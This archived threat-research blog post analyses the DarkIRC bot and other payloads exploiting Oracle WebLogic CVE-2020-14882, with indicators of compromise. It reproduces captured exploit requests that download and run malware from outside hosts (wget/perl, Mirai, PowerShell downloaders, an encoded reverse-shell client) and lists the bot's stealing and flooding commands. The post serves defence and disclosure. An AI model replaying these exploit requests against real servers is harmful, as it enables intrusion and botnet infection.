{
	"id": "a7a1f684-22e5-490f-9c4d-7c3f17824aac",
	"created_at": "2026-04-06T00:10:15.512703Z",
	"updated_at": "2026-04-10T03:20:42.062341Z",
	"deleted_at": null,
	"sha1_hash": "438d9614927c8ea4a0ce70fee2346a87b211f768",
	"title": "DarkIRC bot exploits recent Oracle WebLogic vulnerability",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 654537,
	"plain_text": "DarkIRC bot exploits recent Oracle WebLogic vulnerability\r\nBy Paul Kimayong\r\nPublished: 2020-12-01 · Archived: 2026-04-05 22:00:40 UTC\r\nJuniper Threat Labs is seeing active attacks on Oracle WebLogic software using CVE-2020-14882. This\r\nvulnerability, if successfully exploited, allows unauthenticated remote code execution. As of this writing, we\r\nfound 3,109 open Oracle WebLogic servers using Shodan. We are seeing at least five different variants of\r\nattacks/payload. For the purpose of this blog, we will focus on one particular payload that installs a bot called\r\nDarkIRC. This bot performs a unique command and control domain generation algorithm that relies on the sent\r\nvalue of a particular crypto wallet. This bot is currently being sold on hack forums for $75USD.\r\nhttps://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability\r\nPage 1 of 12\n\nOpen Oracle Weblogic servers on the internet\r\nDarkIRC\r\nDarkIRC version\r\nThe attack issues an HTTP GET request to a vulnerable WebLogic server, which will execute a powershell script\r\nto download and execute a binary file hosted in cnc[.]c25e6559668942[.]xyz\r\nGET /console/images/%252E%252E%252Fconsole.portal?_nfpb=false\u0026_pageLable=\u0026handle=com.tangosol.coheren\r\n(%22java.lang.Runtime.getRuntime().exec('powershell%20-NoP%20-NonI%20-W%20Hidden%20-Exec%20Bypass%20%\r\n(New-Object%20System.Net.WebClient).DownloadFile(%22https://cnc.c25e655{redacted}xyz/svchost.exe%22,%\r\n%20Start-Process%20%22$env:temp%0Degsvc.exe%22%22');%22); HTTP/1.1\r\nHost: {redacted}:7001\r\nConnection: keep-alive\r\nhttps://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability\r\nPage 2 of 12\n\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.24.0\r\nThe source IP is 83.97.20.90. This IP resolves to the C\u0026C of this bot which means the attacker IP is the same as\r\nthe C\u0026C. The sha256 hash of the payload is\r\nd78c90684abcd21b26bccf4b6258494a894d9b8d967a79639f0815a17e1e59a5. This payload is a .NET file with a\r\nfile size of 6MB, fairly encrypted and has the following properties:\r\nBasic structure of the crypter\r\nThe Crypter\r\nThe crypter or the packer is being used primarily to conceal its true intention and avoid detection. It also includes\r\nanti-analysis and anti-sandbox functions. It tries to detect if it is running under the following virtualized\r\nenvironments to determine if it should  not continue its malicious routine:\r\nVMware\r\nVirtualBox\r\nVBox\r\nQEMU\r\nXen\r\nIf it is not, it will load an encrypted file in its resource.\r\nhttps://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability\r\nPage 3 of 12\n\nDarkIRC Crypter virtual environment check\r\nAfter unpacking, we can clearly see what this malware wants to do, based on the name of its functions.\r\nFunctions inside DarkIRC when unpacked\r\nBot Functions\r\nhttps://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability\r\nPage 4 of 12\n\nThe bot installs itself in the %APPDATA%\\Chrome\\Chrome.exe and creates an autorun entry. Among its\r\nfunctions include:\r\nBrowser Stealer\r\nKeylogging\r\nBitcoin Clipper\r\nDDoS\r\nSlowloris\r\nRUDY (R-U-DeadYet?)\r\nTCP Flood\r\nHTTP Flood\r\nUDP Flood\r\nSyn Flood\r\nWorm or spread itself in the network\r\nDownload Files\r\nExecute Commands\r\nBitcoin Clipper\r\nThis function allows the malware to change the copied bitcoin wallet address to the malware operator’s bitcoin\r\nwallet address. This essentially allows it to steal bitcoin transactions on the infected system. This is similar to what\r\nMasad Stealer does.\r\nDarkIRC clipping routine\r\nBitcoin address by the malware operator:\r\n3QRwJwLRFDBoeLZ2cToGUsdBGB3eqj3exH\r\nIt connects to its Command and Control via IRC with an added encryption XOR encryption.\r\nhttps://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability\r\nPage 5 of 12\n\nCnC communication is encrypted via XOR\r\nBelow are the bot commands:\r\nCommand Action\r\nsteal Steal browser passwords\r\nmssql Spread via mssql (brute force)\r\nstopall Stop all flood attacks\r\nrudy Start or stop rudy flood attacks. If command includes stop, it means stop rudy attacks.\r\nrdp Spread via RDP (brute force)\r\nupdate Update this bot\r\nupload Upload files \r\ndlexerem Download, execute and remove\r\nudp Start/Stop udp flood attacks\r\nversion Get version info of the infected system\r\ndlexe Download and execute\r\nusername Get username of the infected system\r\ncd Set current directory\r\ngetip Get IP address of the infected system\r\nmd5 Get config md5 of bot\r\nusbspread Spread via USB\r\ntcp Start/Stop tcp flood attack\r\nhttps://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability\r\nPage 6 of 12\n\ndiscord Steal discord token\r\nbotversion Get bot version\r\nsyn Syn flood\r\nhttp Http flood\r\nslowloris Slowloris DDoS attack\r\nuninstall Uninstall itself\r\nsmb Spread via SMB\r\ncmd Run command\r\nCommand and Control DGA\r\nOne of its interesting functions is to generate a domain, based on the value of a particular dogecoin wallet,\r\nDHeMmdtVhMYQxjbhe2yKvm8nbjSx1At6cZ\r\nIt hashes the sent value of the wallet and gets the first 14 characters of the hash to complete the cnc domain below:\r\ncnc .\u003cgenerated hash[:14].xyz\u003e\r\nAt its current value, the resulting domain will be:\r\ncnc[dot]c25e6559668942.xyz\r\nDarkIRC uses a DGA that depends on the sent value of a particular dogecoin wallet\r\nThe URL request returns a json formatted string, which includes the amount “sent” from that wallet.\r\nCurrent sent value of the wallet that the DGA relies on.\r\nhttps://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability\r\nPage 7 of 12\n\nIn the event that the existing domain is taken down, the malware operator could make a transaction that will\r\nchange the “sent” value from the wallet, which will generate a new cnc domain for all the bots.\r\nWho is behind this?\r\nWe found an account in Hack Forums by the name of “Freak_OG” that advertised this botnet back in August\r\n2020 for $75USD.\r\nThreat actor advertising on hack forums.\r\nOn November 1, the same account posted a FUD (Fully Undetected) Crypter, selling it for $25USD. The filename\r\nof the file he is showing in this post resembles the “Application Name” of our payload, WindowsFormsApp2.exe.\r\nThreat actor advertising it’s crypter\r\nWe are not certain if the bot operator who attacked our honeypot is the same person who is advertising this\r\nmalware in Hack Forums or one of his/her customers.\r\nConclusion\r\nThreat actors will always be on the hunt for victims. One of the fastest ways for them to be victimized is to use a\r\nzero day exploit and attack the internet, usually via a spray-and-pray technique. \r\nhttps://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability\r\nPage 8 of 12\n\nThis vulnerability was fixed by Oracle in October and a subsequent out of cycle patch was also released in\r\nNovember to fix a hole in the previous patch. We recommend affected systems to patch immediately.\r\nOracle WebLogic RCE attacks\r\nBelow is brief information about the different attacks we have seen from our sensors and the payloads they try to\r\ninstall.\r\nAttack Variant 1: Cobalt Strike Payload\r\nAttacker IP\r\n45.77.178.169\r\nAttack Port\r\n7001\r\nIOC\r\n139[.]180.194.87\r\nGET /console/css/%252e%252e%252fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellS\r\n(weblogic.work.ExecuteThread)Thread.currentThread();%20weblogic.work.WorkAdapter%20adapter%20=%20cur\r\n=%20adapter.getClass().getDeclaredField(%22connectionHandler%22);field.setAccessible(true);Object%20o\r\nweblogic.servlet.internal.ServletRequestImpl%20req%20=%20(weblogic.servlet.internal.ServletRequestImp\r\n%20String%20cmd%20=%20req.getHeader(%22cmd%22);String%5B%5D%20cmds%20=%20System.getProperty(%22os.nam\r\ncmd.exe%22,%20%22/c%22,%20cmd%7D%20:%20new%20String%5B%5D%7B%22/bin/sh%22,%20%22-c%22,%20cmd%7D;if(cm\r\n(new%20java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(%22%5C%5CA%22).next();%2\r\n(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(%22getResponse%22).invoke(req\r\n(new%20weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();%7D%20curren\r\nUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nConnection: keep-alive\r\ncmd: powershell -ENC DQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAA\r\nThe powershell script executes a shellcode, which downloads from https://139[.]180.194.87:2233/LkQT. The URL\r\ndid not return anything during our test. Based on threat intelligence, this IP is related to Cobalt Strike.\r\nhttps://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability\r\nPage 9 of 12\n\nShellcode downloading Cobalt Strike\r\nAttack Variant 2: Perlbot Payload\r\nAttacker IP\r\n85.248.227.163\r\nAttack Port\r\n7001\r\nPayload Hash\r\nef7df0f86ed1a1bca365d7247d60384ece4687db28e5ec9aee1a61b1cfa4befa\r\nPOST /console/css/%252e%252e%252fconsole.portal HTTP/1.0\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\ncmd: unset HISTFILE;unset HISTSAVE;wget https://159.69.66.124/bo;perl bo;rm -rf bo\r\nContent-Length: 1216\r\n_nfpb=true\u0026_pageLabel=HomePage1\u0026handle=com.tangosol.coherence.mvel2.sh.ShellSession\r\n('weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\r\nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();java.lang.reflect...{redacted}\r\nAttack 3: Meterpreter Payload\r\nAttacker IP\r\n185.65.134.178\r\nhttps://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability\r\nPage 10 of 12\n\nAttack Port\r\n7001\r\nPayload Hash\r\n4bafb11609f744948f7adbba60b8f122906d6cb079b1a1f3b9ba82f362e03889\r\nPOST /console/css/.%252e/console.portal HTTP/1.1\r\nHost: {redacted}:7001\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2304\r\nhandle=com.tangosol.coherence.mvel2.sh.ShellSession%28%27java.lang.Runtime.getRuntime%28%29.exec%28ne\r\njava.lang.String%28java.util.Base64.getDecoder%28%29.decode%28%22cG93ZXJzaGVsbCAtdyBoaWRkZW4gLW5vcCAt\r\n0nMTg1LjY1LjEzNC4xNzgnOyRiPTg3Nzc7JGM9TmV3LU9iamVjdCBzeXN0ZW0ubmV0LnNvY2tldHMudGNwY2xpZW50OyRuYj1OZXc\r\nN0IFN5c3RlbS5CeXRlW10gJGMuUmVjZWl2ZUJ1ZmZlcl{redacted}\r\nAttack 4: Mirai Payload\r\nAttacker IP\r\n83.97.20.90\r\nAttack Port\r\n7001\r\nPayload Hash\r\n81d51082566d3cebbc8d0d3df201a342f8056efbfb95a7778b6f5d56a264fb07\r\nGET /console/images/%252E%252E%252Fconsole.portal?_nfpb=false\u0026_pageLable=\u0026\r\nhandle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec\r\n('wget%20https://83[dot]97.20.90/mirai.x86%20-O%20/tmp/kpin;chmod%20777%20/tmp/kpin;/tmp/kpin');\r\n%22); HTTP/1.1\r\nHost: {redacted}:7001\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nhttps://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability\r\nPage 11 of 12\n\nAccept: */*\r\nUser-Agent: python-requests/2.24.0\r\nContent-type: application/x-www-form-urlencoded; charset=utf-8\r\nThe exploit is detected by IDP as “HTTP:ORACLE:WLOGIC-UNAUTH-RCE”. \r\nJuniper Advanced Threat Prevention (ATP) detects this file.\r\nSource: https://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability\r\nhttps://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability"
	],
	"report_names": [
		"darkirc-bot-exploits-oracle-weblogic-vulnerability"
	],
	"threat_actors": [],
	"ts_created_at": 1775434215,
	"ts_updated_at": 1775791242,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/438d9614927c8ea4a0ce70fee2346a87b211f768.pdf",
		"text": "https://archive.orkl.eu/438d9614927c8ea4a0ce70fee2346a87b211f768.txt",
		"img": "https://archive.orkl.eu/438d9614927c8ea4a0ce70fee2346a87b211f768.jpg"
	}
}